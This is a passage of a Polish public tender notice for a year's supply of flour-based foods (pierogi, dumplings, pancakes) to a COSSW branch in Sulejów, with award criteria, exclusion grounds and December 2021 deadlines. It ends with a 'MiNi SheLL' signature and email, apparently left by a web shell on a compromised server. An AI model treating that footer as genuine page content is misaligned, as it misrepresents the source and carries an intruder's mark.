W;<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru: <br/> L = C + W<br/>gdzie: <br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”, <br/>W – punkty uzyskane w kryterium „Czas wymiany wadliwego towaru, uzupełnienia towaru”,<br/>Jeżeli Wykonawca nie określi czasu wymiany/uzupełnienia towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas powyżej 24 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> dostawy produktów mącznych dla COSSW w Kulach Oddział Zamiejscowy w Sulejowie <br/>l.p.	Nazwa artykułu	j.m.	Ilość<br/>1	Pierogi z serem	kg	230<br/>2	Pierogi z mięsem	kg	230<br/>3	Kopytka	kg	80<br/>4	Krokiety	kg	200<br/>5	Naleśniki z owocami	kg	230<br/>6	Naleśniki z serem	kg	350<br/>7	Kluski śląskie	kg	140<br/>8	Kartacze z mięsem	kg	40<br/>9	Pyzy z mięsem	kg	220<br/>10	Knedle	kg	65<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 5b do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15851000-8 - Produkty mączne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: <br/>1) „Łączna cena ofertowa brutto” – C; <br/>2) „Czas wymiany wadliwego towaru, uzupełnienia towaru ” – W;<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru: <br/> L = C + W<br/>gdzie: <br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”, <br/>W – punkty uzyskane w kryterium „Czas wymiany wadliwego towaru, uzupełnienia towaru”,<br/>Jeżeli Wykonawca nie określi czasu wymiany/uzupełnienia towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas powyżej 24 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych,<br/>w zakresie braku podstaw wykluczenia:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu<br/>potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, wystawione<br/>nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy.<br/>Formularz cenowy w zakresie części 1 do 3. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie:<br/>1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie<br/>zobowiązania;<br/>2) zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia;<br/>3) pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną,<br/>zaś fakt ustanowienia pełnomocnictwa musi wynikać z załączonych do oferty dokumentów;<br/>2. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający może przed zawarciem umowy żądać przedstawienia w<br/>określonym terminie umowy regulującej współpracę tych Wykonawców.<br/>3. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych<br/>części zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacje w tym zakresie zostały opisane w załączniku nr 4 do SWZ Projekt umowy par. 11. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem formularza do złożenia , zmiany wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com